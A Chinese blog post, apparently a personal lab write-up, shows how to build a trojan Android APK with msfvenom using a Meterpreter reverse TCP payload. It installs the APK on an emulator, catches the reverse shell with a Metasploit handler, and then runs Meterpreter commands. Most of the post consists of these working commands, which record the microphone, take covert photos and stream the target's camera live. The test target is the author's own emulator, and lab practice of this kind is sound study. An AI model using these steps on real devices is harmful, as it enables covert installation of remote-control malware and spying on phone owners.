admin 管理员组

文章数量: 887021

目录

目录

前言

系列文章列表

渗透测试基础之永恒之蓝漏洞复现http://t.csdn/EsMu2

思维导图

1,实验涉及复现环境   

2,Android模拟器环境配置

2.1,首先从官网上下载雷电模拟器

2.2,安装雷电模拟器 

2.3, 对模拟器网络进行配置

2.3.1,为什么要进行配置

2.3.2,进行配置 

2.3.3,安装成功后显示安装成功

3,生成后门

3.1,生成木马apk文件

3.2,将文件复制到windows系统上

3.3,将apk文件安装到模拟器中

3.4,木马文件安装成功

4,使用metasploit控制台对模拟器进行攻击

4.1 启动metasploit

4.2,使用攻击模块

4.3,设置攻击载荷

4.4,设置攻击机和端口号和攻击:

4.5,回到我们的模拟器靶机,我们点击运行我们安装的文件

 4.6 看到成功返回shell

5, 成功后我们能做什么?

5.1,查看模拟手机的版本信息

5.2,查看手机的网络信息

5.3,查看root状态

5.4,启用网页视屏聊天

5.5,查看手机有几个摄像头

5.6,进行录音操作

5.7,一些其他操作

5.7.1.网络和系统信息获取

5.7.2,系统命令执行和摄像头操作

6,总结


前言

本文章主要是进行一次测试吧,自己之前也没有进行过测试关于apk木马远控,最近事情也比较多,自己也就做一个简单的测试吧,后期会尝试使用自己的手机做一个真机测试.

系列文章列表


渗透测试基础之永恒之蓝漏洞复现http://t.csdn/EsMu2

思维导图

1,实验涉及复现环境   

  • Kali平台(Hack):192.168.10.xxx
  • Android模拟器(靶机1)
  • kali需要使用桥接模式,不然无法使用

                         如果出现桥接无法使用可以看这位大佬的配置教程 

                                kali无法连接网络(桥接、NAT无效)http://t.csdn/r9cug

2,Android模拟器环境配置

2.1,首先从官网上下载雷电模拟器

                                                   打开官网进行下载

雷电安卓模拟器-手游模拟器安卓版_android手机模拟器电脑版_雷电模拟器官网 (ldmnq)https://www.ldmnq/

2.2,安装雷电模拟器 

                   下载完后。点击.exe文件直接运行安装,运行,下一步,直接完成安装。

                         安装后我们会在桌面看到这两个图标,然后我们点击雷神多开器

2.3, 对模拟器网络进行配置

2.3.1,为什么要进行配置

   安照我自己的理解就是,我们是在模拟器中模拟手机,所以就类似于我们使用虚拟机一样,所以我们需要将其与主机在同一网段下,这样我们才能对其进行攻击与控制.

2.3.2,进行配置 

对模拟器网络进行配置在右边的设置里面选择设置>网络设置>网络桥接模式开启,ip设置dhcp,最下面点击安装:

2.3.3,安装成功后显示安装成功

3,生成后门

3.1,生成木马apk文件

打开虚拟机,启动kali,打开终端,生成apk后门。lhost为kali的ip(可以根据自己的IP设定),lport指定一个端口5001(这里生成时指定的端口要与后续使用攻击端口一致,当然也不能使用特殊端口)。打开终端输入命令:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.223.138 lport=5001 >内心如初.apk

3.2,将文件复制到windows系统上

生成文件后,因为我是在桌面打开的终端文件会自动生成到桌面,然后将apk文件粘贴到我们的windows平台下,然后启动我们的雷电模拟器,点击启动:

3.3,将apk文件安装到模拟器中

                           这里我们可以将文件拖入或是选择文件放入也行

                                     在右下角有个apk,点击选择文件安装。

3.4,木马文件安装成功

                                出现下面的图标代表安装木马文件成功

4,使用metasploit控制台对模拟器进行攻击

这里关于前面的内容我就快速过来了,如果感兴趣的可以去看系列文章,有前面操作的详细介绍

4.1 启动metasploit

msfconsole 

4.2,使用攻击模块

use exploit/multi/handler

4.3,设置攻击载荷

                                           攻击载荷也就是攻击的脚本

set payload android/meterpreter/reverse_tcp

4.4,设置攻击机和端口号和攻击:

                 这里设置的ip地址是kali的,设置的端口要与制作木马时设置的一致

set lhost 192.168.xxx.xxx
set lport 5001
run

 

4.5,回到我们的模拟器靶机,我们点击运行我们安装的文件

 4.6 看到成功返回shell

                                     只要双击一次即可,这里是我多点了

5, 攻击成功后我们能做什么?

                                    这里在进行其他操作前需要先加载stdapi扩展

load stdapi

5.1,查看模拟手机的版本信息

sysinfo

5.2,查看手机的网络信息

ifconfig

5.3,查看root状态

check_root

                                                         手机无root权限

5.4,启用网页视屏聊天

webcam_chat

5.5,查看手机有几个摄像头

webcam_list

                                                        显示有两个摄像头 

5.6,进行录音操作

record_mic

5.7,一些其他操作

                                    进行调用摄像头偷拍,默认为前置摄像头

webcam_snap

网页摄像机视屏流,显示实时画面能够调用摄像头,实时观看被攻击者的像机对着的物体,以下为通过此办法可以获取到一段图片资料 

webcam_stream

                              获得shell后有很多的攻击方法,将其汇总如下

5.7.1.网络和系统信息获取

5.7.2,系统命令执行和摄像头操作

6,总结

本章是对使用木马对手机渗透远控的一次测试,在测试过程中我遇到了,在连接时IP无法使用,在我的思考下,我发现可能是主机的链接方式需要以桥接模式,这样才能保证,主机与和攻击目在同一网段下,但我链接后,发现无论如何也没发连上桥接网络的网络,并且是用ifconfig,并没有显示kali的主机ipv4地址,在我的不断搜索和尝试下,最终连上了网路获取到了新的IP地址,然后重新制作木马apk文件,再进行一次刚刚的流程,虽然解决问题的过程很累,但解决的那一刻,我是很欣喜的,快乐也就如此了吧,再学习自己喜欢的事情上,总是很有动力.

每日一言

如果可以的话,我也想成为这个世界中特殊的存在。

  如果我的学习笔记对你有用,不妨点赞收藏一下,感谢你的支持,当然也欢迎大佬给我一下建议或是对笔记中的不足进行补充,对我学习大有帮助,谢谢。  

本文标签: 远程控制 木马 手机